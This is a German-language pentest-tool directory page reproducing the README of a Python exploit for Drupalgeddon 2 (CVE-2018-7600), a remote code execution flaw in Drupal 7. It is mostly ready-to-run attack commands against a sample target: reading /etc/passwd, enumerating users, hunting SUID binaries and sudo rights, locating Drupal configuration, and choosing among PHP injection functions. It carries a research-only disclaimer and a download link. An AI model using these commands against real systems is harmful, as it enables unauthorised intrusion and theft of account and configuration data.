Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Drupalgeddon2-CVE-2018-7600 — Python-Exploit für CVE-2018-7600 (Drupalgeddon 2), der Remote-Code-Ausführung auf Drupal 7 mit mehreren Injektionsmethoden und vordefinierten Befehlen für Linux und Windows ermöglicht. | Kitploit
Tools/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & Bildung
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

Python-Exploit für CVE-2018-7600 (Drupalgeddon 2), der Remote-Code-Ausführung auf Drupal 7 mit mehreren Injektionsmethoden und vordefinierten Befehlen für Linux und Windows ermöglicht.

Repository anzeigen
5vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 Beschreibung

bixi.py ist ein Exploit für die Schwachstelle CVE‑2018‑7600 (Drupalgeddon 2), die Drupal 7 betrifft. Ermöglicht die Remote-Befehlsausführung (RCE) auf verwundbaren Drupal-Servern über eine intuitive Benutzeroberfläche und vordefinierte Befehle.


⚠️ HAFTUNGSAUSSCHLUSS / RECHTLICHER HINWEIS

DIESE SOFTWARE IST NUR FÜR BILDUNGS- UND FORSCHUNGSZWECKE IN KONTROLLIERTEN UMGEBUNGEN.

  • Nur auf Systemen verwenden, die dir gehören oder für die du eine schriftliche Erlaubnis zum Testen hast
  • Unautorisierte Nutzung ist ILLEGAL und kann strafrechtliche Konsequenzen haben
  • Der Autor übernimmt keine Haftung für Missbrauch dieses Werkzeugs
  • Halte stets die lokalen und internationalen Cybersicherheitsgesetze ein

"With great power comes great responsibility"


📋 Funktionen

  • ✅ Automatische Ausnutzung von CVE‑2018‑7600
  • ✅ Vordefinierte Befehle für Linux und Windows
  • ✅ Mehrere Injektionsmethoden (system, passthru, exec, shell_exec)
  • ✅ Intuitive Benutzeroberfläche mit Hilfesystem
  • ✅ Robustes Fehler- und Timeout-Handling
  • ✅ Formatierte und leicht lesbare Ausgabe

🚀 Schnellinstallation

1. Repository klonen

git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600

2. Abhängigkeiten installieren

# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests

# Otras distribuciones
pip3 install requests

3. Ausführungsberechtigungen erteilen

chmod +x bixi.py

🎯 Grundlegende Verwendung

Vollständige Hilfe anzeigen

python3 bixi.py --help

Allgemeine Syntax

python3 bixi.py <URL> <COMANDO/PALABRA_CLAVE> [INJECTION_TYPE]

Praxisbeispiele

# Verificar vulnerabilidad
python3 bixi.py http://10.99.99.6/drupal/ test

# Detectar sistema operativo
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows

# Enumerar usuarios
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user

# Información del sistema
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig

# Comandos personalizados
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"

📊 Vordefinierte Schlüsselwörter

🐧 Linux

BefehlBeschreibung
linuxSysteminformationen
users_linuxBenutzer auflisten
idBenutzer-/Gruppeninfo
lsDateien auflisten
ifconfigNetzwerkinformationen
find_flagFlags suchen

🪟 Windows

BefehlBeschreibung
windowsSysteminformationen
net_userBenutzer auflisten
whoami_winDetaillierte Informationen
ipconfigNetzwerk
netstat_winVerbindungen
dirVerzeichnis auflisten

🔧 Pentesting

BefehlBeschreibung
sudoSudo-Berechtigungen prüfen
suidSUID-Binärdateien suchen
net_localgroupLokale Gruppen
drupal_configKonfigurationen suchen
drupal_versionDrupal-Version abrufen

🎨 Injektionsmethoden

# system (default)
python3 bixi.py http://target/ "whoami" system

# passthru
python3 bixi.py http://target/ "whoami" passthru

# exec
python3 bixi.py http://target/ "whoami" exec

# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec

🏗️ Projektstruktur

drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│   ├── linux_commands.txt
│   └── windows_commands.txt
└── screenshots/
    ├── help_screen.png
    └── exploit_success.png

🔧 Erweiterte Konfiguration

Proxy (optional)

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

Timeout

Standardwert ändern (15 Sekunden):

timeout=15

Neue Befehle hinzufügen

Das Dictionary commands in get_command_for_keyword() bearbeiten


🐛 Fehlerbehebung

Fehler: No module named 'requests'

pip3 install requests

Fehler: Connection refused

# Verificar conectividad
ping TARGET_IP

# Verificar ruta Drupal
curl http://TARGET_IP/drupal/
Tool herunterladen